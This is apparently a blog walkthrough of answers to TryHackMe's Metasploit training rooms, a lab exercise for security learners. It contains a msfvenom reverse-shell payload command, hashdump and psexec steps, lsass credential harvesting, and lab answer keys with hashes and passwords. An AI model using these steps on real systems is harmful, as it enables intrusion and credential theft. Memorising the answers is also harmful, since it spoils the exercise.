Open in app

Sign in

Write

Sign in

TryHackMe — Jr Penetration Tester — Metasploit

Deepak Kushwah
6 min readOct 31, 2021

Room 1- Metasploit: Introduction

Task 1 Introduction to Metasploit

Read only task!!

Task 2 Main Components of Metasploit

Answer the questions below

Q 1. What is the name of the code taking advantage of a flaw on the target system?

Ans. Exploit

Q 2. What is the name of the code that runs on the target system to achieve the attacker’s goal?

Ans. Payload

Q 3. What are self-contained payloads called?

Ans. Singles

Q 4. Is “windows/x64/pingback_reverse_tcp” among singles or staged payload?

Ans. Singles

Task 3 Msfconsole

Answer the questions below

Q 1. How would you search for a module related to Apache?

Ans. search apache

Q 2. Who provided the auxiliary/scanner/ssh/ssh_login module?

Ans. todb

Task 4 Working with modules

Answer the questions below

Q 1. How would you set the LPORT value to 6666?

Ans. set LPORT 6666

Q 2. How would you set the global value for RHOSTS to 10.10.19.23 ?

Ans. setg RHOSTS 10.10.19.23

Q 3. What command would you use to clear a set payload?

Ans. unset PAYLOAD

Q 4. What command do you use to proceed with the exploitation phase?

Ans. exploit

Room — 2 Metasploit: Exploitation

Task 1 Introduction

Read Only Task!!

Task 2 Scanning

Answer the questions below

Q 1.How many ports are open on the target system?

Ans. 5

Q 2. Using the relevant scanner, what NetBIOS name can you see?

Ans. ACME IT SUPPORT

Q 3. What is running on port 8000?

Ans. webfs/1.21

Q 4. What is the “penny” user’s SMB password? Use the wordlist mentioned in the previous task.

Ans. leo1234

Task 3 The Metasploit Database

Read Only Task!!

Task 4 Vulnerability Scanning

Q 1. Who wrote the module that allows us to check SMTP servers for open relay?

Ans. Campbell Murray

Task 5 Exploitation

Q 1. What is the content of the flag.txt file?

Ans. THM-5455554845

Ennumaration: — Run Nmap to check open services.

to find open vulnerability = nmap -p445 — script vuln <target>

Search payload and let’s try with reverse shell

After selecting payload set RHOST to targeet IP and run exploit and we got Windows CMD access

After digging into directories we found the flad.txt.

Q2. What is the NTLM hash of the password of the user “pirate”?

Ans. 8ce9a3ebd1647fcc5e04025019f4b875

use search hashdump

run post/windows/gather/hashdump

Task 6 Msfvenom

Q 1. What is the other user’s password hash?

Ans. 6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0

Steps: — Creating a meterpreter payload in the .elf format

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.78.250 LPORT=4444 -f elf > rev_shell.elf

Now run http server using python http.server to transfer payload to target machine

We will use Multi Handler to receive the incoming connection. The module can be used with the use exploit/multi/handler command.

Once everything is set, we will run the handler and wait for the incoming connection.

Now run uploaded reverse shell payload on target machine to get meterpreter session

to get password hash run post/linux/gather/hashdump

Task 7 Summary

Read Only Task!!

Room — 3 Metasploit: Meterpreter

Task 1 Introduction to Meterpreter

Read only Task!!

Task 2 Meterpreter Flavors

Read only Task!!

Task 3 Meterpreter Commands

Read only Task!!

Task 4 Post-Exploitation with Meterpreter

Read only Task!!

Task 5 Post-Exploitation Challenge

Statement : — The questions below will help you have a better understanding of how Meterpreter can be used in post-exploitation.

You can use the credentials below to simulate an initial compromise over SMB (Server Message Block) (using exploit/windows/smb/psexec)

Username: ballen

Password: Password1

Solution :-

“use exploit/windows/smb/psexec” in metasploit

Set RHOST <Target_Machine_IP>, SMBuser and SMBpass (Make sure payload is selected to windows/meterpreter/reverse_tcp and listener is running in background)

After explioting we will get meterprater

Answer the questions below

Q 1 . What is the computer name?

Ans. ACME-TEST

Q 2. What is the target domain?

Ans. FLASH

Q 3. What is the name of the share likely created by the user?

Ans. speedster

Background the meterpreter session using command ‘background’

use module ‘post/windows/gather/enum_shares’

set session i_d to running background session i’d

then run the module

Q 4. What is the NTLM hash of the jchambers user?

Ans. 69596c7aa1e8daee17f8e78870e25a5c

migrate to lsass.ese (Local Security Authority Subsystem Service)

Q 5. What is the cleartext password of the jchambers user?

Ans. Trustno1

Q 6. Where is the “secrets.txt” file located?

Ans. c:\Program Files (x86)\Windows Multimedia Platform

Q 7. What is the Twitter password revealed in the “secrets.txt” file?

Ans. KDSvbsw3849!

Q 7. Where is the “realsecret.txt” file located?

Ans. c:\inetpub\wwwroot\

Q 8. What is the real secret?

Ans. The Flash is the fastest man alive

Tryhackme
Tryhackme Walkthrough
Metasploit
Meterpreter
Exploitation

--

--

Deepak Kushwah

Written by Deepak Kushwah

7 Followers

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams